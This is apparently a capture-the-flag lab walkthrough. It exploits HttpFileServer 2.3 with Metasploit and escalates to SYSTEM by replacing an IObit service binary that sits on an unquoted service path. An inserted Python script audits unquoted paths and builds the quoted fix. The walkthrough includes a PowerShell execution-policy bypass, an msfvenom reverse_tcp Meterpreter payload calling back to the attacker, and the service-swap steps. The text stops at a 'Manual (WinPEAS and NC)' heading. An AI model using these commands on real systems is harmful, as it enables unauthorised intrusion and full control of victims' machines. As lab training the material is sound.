Scan with NMAP
The scan shows HFS (HttpFileServer) 2.3, which is a vulnerable version. Which exploit applies?
searchsploit HttpFileServer 2.3
Metasploit:
msfconsole
search rejetto #module name taken from the searchsploit result
use 0
set lhost tun0
set rhost victimMachine
set rport 8080
run
Meterpreter:
getuid
shell
whoami /priv
powershell -ep bypass
Launching an interactive PowerShell this way hangs the shell. Workaround:
We can use PowerUp, but we have to edit it first so it runs its checks automatically when invoked:
mousepad PowerUp.ps1 #it's in /tmp now
#add this to the very end on its own line
Invoke-AllChecks
Upload using meterpreter:
meterpreter > upload /tmp/PowerUp.ps1
Run PowerUp directly from shell:
shell
powershell -ep bypass .\PowerUp.ps1
PowerUp reports an unquoted service path for IObit's service:
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
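As an added example (not part of the original notes and not PowerUp's own code), here is a small Python audit that takes service ImagePath strings, flags the ones that are unquoted and contain spaces, lists the paths Windows tries in order when starting such a service (every directory those land in needs an ACL check so unprivileged users cannot write there), and produces the quoted binPath that remediates the finding. The IObit path is the one reported above; the other service names and paths are constructed.

```python
from __future__ import annotations
import re

# Constructed sample ImagePath values, as they would appear under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath. The IObit entry is
# the path reported by PowerUp in the notes above; the other three are
# made-up comparison cases (hypothetical service names and paths).
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9":
        r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "GoodQuoted": r'"C:\Program Files\Vendor\Tool Service\svc.exe" -k run',
    "NoSpaces": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "UnquotedWithArgs": r"C:\Program Files\Other Vendor\agent.exe --service",
}

_EXE_RE = re.compile(r"(.*?\.exe)", re.IGNORECASE)


def _exe_portion(image_path: str) -> str:
    """Return the executable part of an unquoted ImagePath: everything up to
    and including the first '.exe'. Arguments after it are dropped."""
    p = image_path.strip()
    m = _EXE_RE.match(p)
    return m.group(1) if m else p.split(" ")[0]


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the path is not wrapped in quotes and the executable part
    contains a space, which is the condition PowerUp flags."""
    p = image_path.strip()
    if not p or p.startswith('"'):
        return False
    return " " in _exe_portion(p)


def search_candidates(image_path: str) -> list[str]:
    """Paths Windows tries, in order, when starting a service whose unquoted
    ImagePath contains spaces: each prefix ending at a space gets '.exe'
    appended and is tried before the real binary. A defender must verify that
    none of the directories these land in is writable by unprivileged users."""
    exe = _exe_portion(image_path)
    tokens = exe.split(" ")
    candidates = [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]
    candidates.append(exe)
    return candidates


def quoted_fix(image_path: str) -> str:
    """The remediated ImagePath: executable wrapped in double quotes, any
    arguments preserved unchanged."""
    p = image_path.strip()
    exe = _exe_portion(p)
    return f'"{exe}"{p[len(exe):]}'


def audit(services: dict[str, str]) -> dict[str, dict[str, object]]:
    """Map each vulnerable service name to its lookup candidates and fix."""
    findings: dict[str, dict[str, object]] = {}
    for name, path in services.items():
        if is_unquoted_with_spaces(path):
            findings[name] = {
                "candidates": search_candidates(path),
                "fix": quoted_fix(path),
            }
    return findings


if __name__ == "__main__":
    for name, info in audit(SAMPLE_SERVICES).items():
        print(f"[!] {name}")
        for c in info["candidates"]:
            print(f"    tries: {c}")
        print(f"    fix:   {info['fix']}")
```

On a real host the output of quoted_fix is what an administrator feeds to sc config <service> binPath= (with the inner double quotes escaped as \" inside the outer argument), after which the service resolves only the intended binary.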
Query the service:
sc query AdvancedSystemCareService9
We can stop the service so the binary in that path can be swapped out, then restart it afterwards:
sc stop AdvancedSystemCareService9
Running systeminfo tells us that it's x64 architecture, so we can build an x64 executable with the same name as the exe we found:
Listener:
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 5555
run
make the exe:
cd /tmp
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=5555 -f exe > ASCService.exe
In meterpreter, navigate to the service directory (note how backslashes and spaces are escaped):
cd c:\\
cd "program files (x86)"
pwd
cd IObit
cd "Advanced SystemCare"
pwd
Note: the pwd commands are just checks to make sure we're in the right place.
Upload our executable to the machine:
upload /home/kali/transfer/ASCService.exe
Start the service:
shell
sc start AdvancedSystemCareService9
Meterpreter:
getuid
NT Authority\System
Manual (WinPEAS and NC)